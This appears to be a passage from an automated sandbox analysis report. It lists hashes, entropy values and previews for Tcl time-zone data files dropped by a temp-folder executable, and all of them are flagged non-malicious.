                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:pXxS559B2XW6X8x3X3D2D8IOdXkqbfkeTzlbaqvOTFhPI1jFIL:pXxS559B2XW6XU3X3D2D8IOdXkqbfNT2
                                                                                                                                                                                                                                                                                                                                MD5:9614153F9471187A2F92B674733369A0
                                                                                                                                                                                                                                                                                                                                SHA1:199E8D5018A374EDB9592483CE4DDB30712006E3
                                                                                                                                                                                                                                                                                                                                SHA-256:5323EBC8D450CC1B53AED18AD209ADEB3A6EEB5A00A80D63E26DB1C85B6476ED
                                                                                                                                                                                                                                                                                                                                SHA-512:2A1E26D711F62C51A5EE7014584FAF41C1780BD62573247D45D467500C6AB9A9EAD5A382A1986A9D768D7BB927E4D391EA1B7A4AD9A54D3B05D8AD2385156C33
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Petersburg) {. {-9223372036854775808 -20947 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-473364000 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-292438800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-257965200 -21600 0 CST}. {-242236800 -18000 1 CDT}. {-226515600 -21600 0 CST}. {-210787200 -18000 1 CDT}. {-195066000 -21600 0 CST}. {-179337600 -18000 1 CDT}. {-163616400 -21600 0 CST
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6992
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7768650637181533
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:CXxjL36559B2XI6XE3X3D2E0bYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3g:CXxjL36559B2XI6XE3X3D2E0bYkzbXw6
                                                                                                                                                                                                                                                                                                                                MD5:D0F40504B578D996E93DAE6DA583116A
                                                                                                                                                                                                                                                                                                                                SHA1:4D4D24021B826BFED2735D42A46EEC1C9EBEA8E3
                                                                                                                                                                                                                                                                                                                                SHA-256:F4A0572288D2073D093A256984A2EFEC6DF585642EA1C4A2860B38341D376BD8
                                                                                                                                                                                                                                                                                                                                SHA-512:BA9D994147318FF5A53D45EC432E118B5F349207D58448D568E0DB316452EF9FD620EE4623FD4EAD123BC2A6724E1BAE2809919C58223E6FD4C7A20F004155E0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Tell_City) {. {-9223372036854775808 -20823 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-289414800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-260989200 -21600 0 CST}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6350
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.782861360101505
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:K9Xx3+lsHRwvOTFhP5S+ijFnRaJeaX1eyDt:6XxuoqvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:35A64C161E0083DCE8CD1E8E1D6EBE85
                                                                                                                                                                                                                                                                                                                                SHA1:9BC295C23783C07587D82DA2CC25C1A4586284B2
                                                                                                                                                                                                                                                                                                                                SHA-256:75E89796C6FB41D75D4DDA6D94E4D27979B0572487582DC980575AF6656A7822
                                                                                                                                                                                                                                                                                                                                SHA-512:7BAF735DA0DE899653F60EED6EEF53DD8A1ABC6F61F052B8E37B404BC9B37355E94563827BC296D8E980C4247864A57A117B7B1CB58A2C242991BBDC8FE7174E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Vevay) {. {-9223372036854775808 -20416 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-495043200 -18000 0 EST}. {-31518000 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {94712400 -18000 0 EST}. {1136091600 -18000 0 EST}. {1143961200 -14400 1 EDT}. {1162101600 -18000 0 EST}. {1173596400 -14400 1 EDT}. {1194156000 -18000 0 EST}. {1205046000 -14400 1 EDT}. {1225605600 -18000 0 EST}. {1236495600 -14400 1 EDT}. {1257055200 -18000 0 EST}. {1268550000 -14400 1 EDT}. {1289109600 -18000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6992
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.795913753683276
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:TXxjL36559B2XI6XE3X3D2E0baqvOTFhPI1jFIL:TXxjL36559B2XI6XE3X3D2E0bZ3+
                                                                                                                                                                                                                                                                                                                                MD5:AD8B44BD0DBBEB06786B2B281736A82B
                                                                                                                                                                                                                                                                                                                                SHA1:7480D3916F0ED66379FC534F20DC31001A3F14AF
                                                                                                                                                                                                                                                                                                                                SHA-256:18F35F24AEF9A937CD9E91E723F611BC5D802567A03C5484FAB7AEEC1F2A0ED0
                                                                                                                                                                                                                                                                                                                                SHA-512:7911EC3F1FD564C50DEAF074ED99A502A9B5262B63E3E0D2901E21F27E90FBD5656A53831E61B43A096BA1FF18BB4183CCCE2B903782C2189DAAFDD7A90B3083
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Vincennes) {. {-9223372036854775808 -21007 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-289414800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-260989200 -21600 0 CST}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7170
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7942292979267767
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:YXxjJ2eQzURWu3Oab9B2XWR0/qvOTFhPI1jFIL:YXxjJ2eQzUwu3Oab9B2XWR0M3+
                                                                                                                                                                                                                                                                                                                                MD5:40D8E05D8794C9D11DF018E3C8B8D7C0
                                                                                                                                                                                                                                                                                                                                SHA1:58161F320CB46EC72B9AA6BAD9086F18B2E0141B
                                                                                                                                                                                                                                                                                                                                SHA-256:A13D6158CCD4283FE94389FD341853AD90EA4EC505D37CE23BD7A6E7740F03F6
                                                                                                                                                                                                                                                                                                                                SHA-512:BC45B6EFF1B879B01F517D4A4012D0AFBA0F6A9D92E862EF9A960FE07CBE216C8C929FE790044C566DC95981EC4BEAB3DCBD45A1FE597606CF601214A78AEA08
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Winamac) {. {-9223372036854775808 -20785 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-447267600 -21600 0 CST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):228
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.655121947675421
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y73GK7mFVAIgp3GKBL2903GfJ4903GK1:MBaIMY3GK7Hp3GKBL2903GfJ4903GK1
                                                                                                                                                                                                                                                                                                                                MD5:CB79BE371FAB0B0A5EBEB1BA101AA8BA
                                                                                                                                                                                                                                                                                                                                SHA1:6A24348AB24D6D55A8ABDEE1500ED03D5D1357F3
                                                                                                                                                                                                                                                                                                                                SHA-256:6AABF28AC5A766828DD91F2EE2783F50E9C6C6307D8942FCD4DFAE21DB2F1855
                                                                                                                                                                                                                                                                                                                                SHA-512:156E1E7046D7A0938FE4BF40BC586F0A7BEF1B0ED7B887665E9C6041980B511F079AA739B7BD42A89794CB9E82DB6629E81DD39D2F8161DFABDED539E272FB6E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Indianapolis)]} {. LoadTimeZoneFile America/Indiana/Indianapolis.}.set TZData(:America/Indianapolis) $TZData(:America/Indiana/Indianapolis).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7389
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.778898781146325
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:/ZGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:/EVUC2mWBNwWTxyWR
                                                                                                                                                                                                                                                                                                                                MD5:EFEFB694C4F54583C0ED45A955E823AF
                                                                                                                                                                                                                                                                                                                                SHA1:6FF35D151E8E1DED0DC362671FFF904B3CFF59B4
                                                                                                                                                                                                                                                                                                                                SHA-256:72C48C0CCC1B8C1BD80E5BB5B8879A07A2DBE82317667568523BBE1F855E4883
                                                                                                                                                                                                                                                                                                                                SHA-512:52BDACF02C5A595927FF9B7DC0151367C81B259C8831A91F66A0C10D5271DCDF834763F44868CCF7EDA497295D9D55C49C8F8FD43EEC383C29BC3CABAA4B6B0F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Inuvik) {. {-9223372036854775808 0 0 -00}. {-536457600 -28800 0 PST}. {-147888000 -21600 1 PDDT}. {-131558400 -28800 0 PST}. {315558000 -25200 0 MST}. {325674000 -21600 1 MDT}. {341395200 -25200 0 MST}. {357123600 -21600 1 MDT}. {372844800 -25200 0 MST}. {388573200 -21600 1 MDT}. {404899200 -25200 0 MST}. {420022800 -21600 1 MDT}. {436348800 -25200 0 MST}. {452077200 -21600 1 MDT}. {467798400 -25200 0 MST}. {483526800 -21600 1 MDT}. {499248000 -25200 0 MST}. {514976400 -21600 1 MDT}. {530697600 -25200 0 MST}. {544611600 -21600 1 MDT}. {562147200 -25200 0 MST}. {576061200 -21600 1 MDT}. {594201600 -25200 0 MST}. {607510800 -21600 1 MDT}. {625651200 -25200 0 MST}. {638960400 -21600 1 MDT}. {657100800 -25200 0 MST}. {671014800 -21600 1 MDT}. {688550400 -25200 0 MST}. {702464400 -21600 1 MDT}. {720000000 -25200 0 MST}. {733914000 -
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7421
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7475594770809835
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:0/GC3XmzdsHRwvOTFhP5S+ijFnRaJeaX1eyDt:0/Pn0gqvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:67B9C859DCD38D60EB892500D7287387
                                                                                                                                                                                                                                                                                                                                SHA1:E91BE702B1D97039528A3F540D1FFFF553683CE9
                                                                                                                                                                                                                                                                                                                                SHA-256:34D907D9F2B36DC562DCD4E972170011B4DA98F9F6EDA819C50C130A51F1DBED
                                                                                                                                                                                                                                                                                                                                SHA-512:239B0BA842C1432DB5A6DE4E0A63CDE4B4800FC76AE237B0E723116426F0700FFF418634FB1B5641B87E7792709E16A9ED679E37A570E9D723E3561C2B6B45B5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Iqaluit) {. {-9223372036854775808 0 0 -00}. {-865296000 -14400 0 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {-147898800 -10800 1 EDDT}. {-131569200 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {452070000 -14400 1 EDT}. {467791200 -18000 0 EST}. {483519600 -14400 1 EDT}. {499240800 -18000 0 EST}. {514969200 -14400 1 EDT}. {530690400 -18000 0 EST}. {544604400 -14400 1 EDT}. {562140000 -18000 0 EST}. {576054000 -14400 1 EDT}. {594194400 -18000 0 EST}. {607503600 -14400 1 EDT}. {625644000 -18000 0 EST}. {638953200 -14400 1 EDT}. {657093600 -18000 0 EST}. {671007600 -14400 1 EDT}. {688543200 -18000 0 EST}. {702457200 -14400 1 EDT}. {71999280
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):818
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.132568007446054
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQ1ewtWFD/u/Ip/uJD/u2lR/utzN54i/uhU/ufUF5/uDBq/u63gU/u3Zh/u4u8H:5htWFYIgxmzfwuFqBG3g/k8H
                                                                                                                                                                                                                                                                                                                                MD5:5C35FFB7D73B7F46DB4A508CF7AB1C54
                                                                                                                                                                                                                                                                                                                                SHA1:5C631104044E9413C86F95E072A630C2AD9EA56D
                                                                                                                                                                                                                                                                                                                                SHA-256:7FDD008C250308942D0D1DE485B05670A6A4276CB61F5F052385769B7E1906C1
                                                                                                                                                                                                                                                                                                                                SHA-512:7B3FF2C945598DDBF43B0BD0650192D6C70B333BF89916013C35F56DC1489CB65A72BA70FB0AE7341C71A71D4B73805F9D597A5B5FA525F4BFB1DF0F582641AE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Jamaica) {. {-9223372036854775808 -18430 0 LMT}. {-2524503170 -18430 0 KMT}. {-1827687170 -18000 0 EST}. {126248400 -18000 0 EST}. {126687600 -14400 1 EDT}. {152085600 -18000 0 EST}. {162370800 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {441781200 -18000 0 EST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):206
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.89710274358395
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7/MI1VAIgp/MI+290pPGe90/MIE:MBaIMY/Mvp/Mh290h390/MB
                                                                                                                                                                                                                                                                                                                                MD5:320C83EFE59FD60EB9F5D4CF0845B948
                                                                                                                                                                                                                                                                                                                                SHA1:5A71DFAE7DF9E3D8724DFA533A37744B9A34FFEC
                                                                                                                                                                                                                                                                                                                                SHA-256:67740B2D5427CFCA70FB53ABD2356B62E01B782A51A805A324C4DFAD9ACA0CFA
                                                                                                                                                                                                                                                                                                                                SHA-512:D7A6378372386C45C907D3CB48B923511A719794B0C0BFA3694DBCE094A46A48249720653836C2F10CBB2178DD8EEEEA6B5019E4CC6C6B650FD7BE256BE1CA99
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Jujuy)]} {. LoadTimeZoneFile America/Argentina/Jujuy.}.set TZData(:America/Jujuy) $TZData(:America/Argentina/Jujuy).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8406
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8821515247187883
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:sL19jPaps/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:sB9jPP/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                                                                                                MD5:7D338E0224E7DDC690766CDC3E436805
                                                                                                                                                                                                                                                                                                                                SHA1:89BB26B7731AC40DE75FFCD854BA4D30A0F1B716
                                                                                                                                                                                                                                                                                                                                SHA-256:B703FC5AA56667A5F27FD80E5042AFE0F22F5A7EF7C5174646B2C10297E16810
                                                                                                                                                                                                                                                                                                                                SHA-512:7B52EDD2FE3ECAB682138EC867B4D654A08BEA9C4A3BB20E1ED69F03DD9EF91A3B707C78D25CA5A32938152157E98188A253AD2D2D283EF24ECE7352BCB88B67
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Juneau) {. {-9223372036854775808 54139 0 LMT}. {-3225223727 -32261 0 LMT}. {-2188954939 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677600
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9332
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.769996646995791
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:wmXxSkUArUfxLURWu3O5bMQxXI6Xah0drn+qvOTFhPI1jFIL:wmXxSkUArUfxLUwu3O5bMQxXI6Xah2n8
                                                                                                                                                                                                                                                                                                                                MD5:D9BC20AFD7DA8643A2091EB1A4B48CB3
                                                                                                                                                                                                                                                                                                                                SHA1:9B567ABF6630E7AB231CAD867AD541C82D9599FF
                                                                                                                                                                                                                                                                                                                                SHA-256:B4CC987A6582494779799A32A9FB3B4A0D0298425E71377EB80E2FB4AAAEB873
                                                                                                                                                                                                                                                                                                                                SHA-512:0BC769A53E63B41341C25A0E2093B127064B589F86483962BD24DB4082C4466E12F4CD889B82AD0134C992E984EF0897113F28321522B57BA45A98C15FF7E172
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Kentucky/Louisville) {. {-9223372036854775808 -20582 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1546279200 -21600 0 CST}. {-1535904000 -18000 1 CDT}. {-1525280400 -21600 0 CST}. {-905097600 -18000 1 CDT}. {-891795600 -21600 0 CST}. {-883591200 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-744224400 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-684349200 -18000 1 CDT}. {-652899600 -18000 1 CDT}. {-620845200 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8279
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.785637200740036
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:jFPXxEOdXkqbfkeTzZSJw5/9/yuvQ+hcrD57X0N41+gqvOTFhPI1jFIL:5PXxEOdXkqbfNTzZSJw5/9/yuvQ6crD9
                                                                                                                                                                                                                                                                                                                                MD5:0C6F5C9D1514DF2D0F8044BE27080EE2
                                                                                                                                                                                                                                                                                                                                SHA1:70CBA0561E4319027C60FB0DCF29C9783BFE8A75
                                                                                                                                                                                                                                                                                                                                SHA-256:1515460FBA496FE8C09C87C51406F4DA5D77C11D1FF2A2C8351DF5030001450F
                                                                                                                                                                                                                                                                                                                                SHA-512:17B519BCC044FE6ED2F16F2DFBCB6CCE7FA83CF17B9FC4A40FDA21DEFBA9DE7F022A50CF5A264F3090D57D51362662E01C3C60BD125430AEECA0887BB8520DB1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Kentucky/Monticello) {. {-9223372036854775808 -20364 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-63136800 -21600 0 CST}. {-52934400 -18000 1 CDT}. {-37213200 -21600 0 CST}. {-21484800 -18000 1 CDT}. {-5763600 -21600 0 CST}. {9964800 -18000 1 CDT}. {25686000 -21600 0 CST}. {41414400 -18000 1 CDT}. {57740400 -21600 0 CST}. {73468800 -18000 1 CDT}. {89190000 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 C
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):199
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8191308888643345
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y73GKXFVAIgp3GK4N2901iZ903GKk:MBaIMY3GKXQp3GKe290Q903GKk
                                                                                                                                                                                                                                                                                                                                MD5:465D405C9720EB7EC4BB007A279E88ED
                                                                                                                                                                                                                                                                                                                                SHA1:7D80B8746816ECF4AF45166AED24C731B60CCFC6
                                                                                                                                                                                                                                                                                                                                SHA-256:BE85C86FBD7D396D2307E7DCC945214977829E1314D1D71EFAE509E98AC15CF7
                                                                                                                                                                                                                                                                                                                                SHA-512:C476022D2CC840793BF7B5841051F707A30CCAB1022E30FB1E45B420077417F517BEDA5564EFB154283C7C018A9CA09D10845C6A1BFE2A2DE7C939E307BDCE6F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Knox)]} {. LoadTimeZoneFile America/Indiana/Knox.}.set TZData(:America/Knox_IN) $TZData(:America/Indiana/Knox).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
